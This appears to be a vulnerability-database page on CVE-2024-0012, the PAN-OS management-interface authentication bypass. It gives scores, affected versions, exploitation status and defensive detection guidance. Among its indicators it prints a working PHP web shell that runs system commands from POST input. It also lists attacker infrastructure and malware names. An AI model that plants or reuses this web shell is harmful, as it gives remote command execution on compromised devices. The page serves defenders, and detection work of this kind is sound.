cbcvebase.
CVE-2024-0012
published 2024-11-18

CVE-2024-0012: An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-12-09
Exploited in the wild
EPSS
99.70%
100.0th percentile
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 . The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability.

Affected

42 ranges· showing 25
VendorProductVersion rangeFixed in
palo_alto_networkspan-os>= 10.2.0 < 10.2.12-h210.2.12-h2
palo_alto_networkspan-os>= 11.0.0 < 11.0.6-h111.0.6-h1
palo_alto_networkspan-os>= 11.1.0 < 11.1.5-h111.1.5-h1
palo_alto_networkspan-os>= 11.2.0 < 11.2.4-h111.2.4-h1
paloaltocloud_ngfw
paloaltocortex_xpanse
paloaltocortex_xsiam
paloaltoglobalprotect
paloaltopan-os
paloaltopanorama
paloaltoprisma_access
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os

Detection & IOCsextracted from sources · hover to see the quote

hash3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668
path/var/appweb/htdocs/unauth/{between 4 and 6 random characters}
ip77.221.158[.]154
domaincensysinspect[.]com
urlcensysinspect[.]com/global-protect/portal/fonts/Latte-Regular.woff
hashe9cd4829b3e64f2f6f45e2761d474f213009d4c8
hashaf817679227921768e15a3a5971b263d5fcf6f75
hashcaae3165bda2e4434f487dee30e39a92e808bfbc
hash90f6890fa94b25fbf4d5c49f1ea354a023e06510
hashfca6e83abce58e47e247bee3ebaef3fc4ad89e75
hash9a7355565ff9d84e1c61e2174ea1a54358f9628f
hashc1dcbf5816f93038313655f1a99f5efc847c637b
hashc63f646edfddb4232afa5618e3fac4eee1b4b115
command<?php $z="system";if(${"_POST"}["b"]=="iUqPd"){ $z(${"_POST"}["x"]);};
  • Monitor for web shell files dropped under /var/appweb/htdocs/unauth/ with 4–6 random character filenames on PAN-OS devices, indicating post-exploitation activity.
  • Alert on HTTP requests to the PAN-OS management web interface bearing the user-agent string 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko', which was observed during multiple actor exploit attempts.
  • Hunt for interactive command execution and dropped malware (web shells, Sliver implants, crypto miners) on PAN-OS firewalls as post-exploitation indicators of CVE-2024-0012 chained with CVE-2024-9474.
  • Scan for DaggerFly Linux implant activity embedding itself in crond, sshd, and netstat binaries on compromised PAN-OS hosts.
  • Check for the PHP web shell POST parameter 'b' with value 'iUqPd' in web server logs on PAN-OS devices as a specific indicator of the observed web shell payload.
  • A more complete and continuously updated list of attacker IP addresses is available at the Unit42-Timely-Threat-Intel GitHub repository for blocking and detection.
  • Detect use of Toshiba executable (toshdpdb.exe) and malicious DLL (toshdpapi.dll) via DLL sideloading to deploy PlugX/Korplug backdoor in attacks attributed to Emperor Dragonfly exploiting CVE-2024-0012.
  • ·CVE-2024-0012 only affects PAN-OS 10.2, 11.0, 11.1, and 11.2; Cloud NGFW and Prisma Access are not impacted.
  • ·7% of cloud environments with vulnerable PAN-OS appliances had the management interface internet-facing and exploitable to unauthenticated RCE; the remaining 93% required network access to the management interface.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Red
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.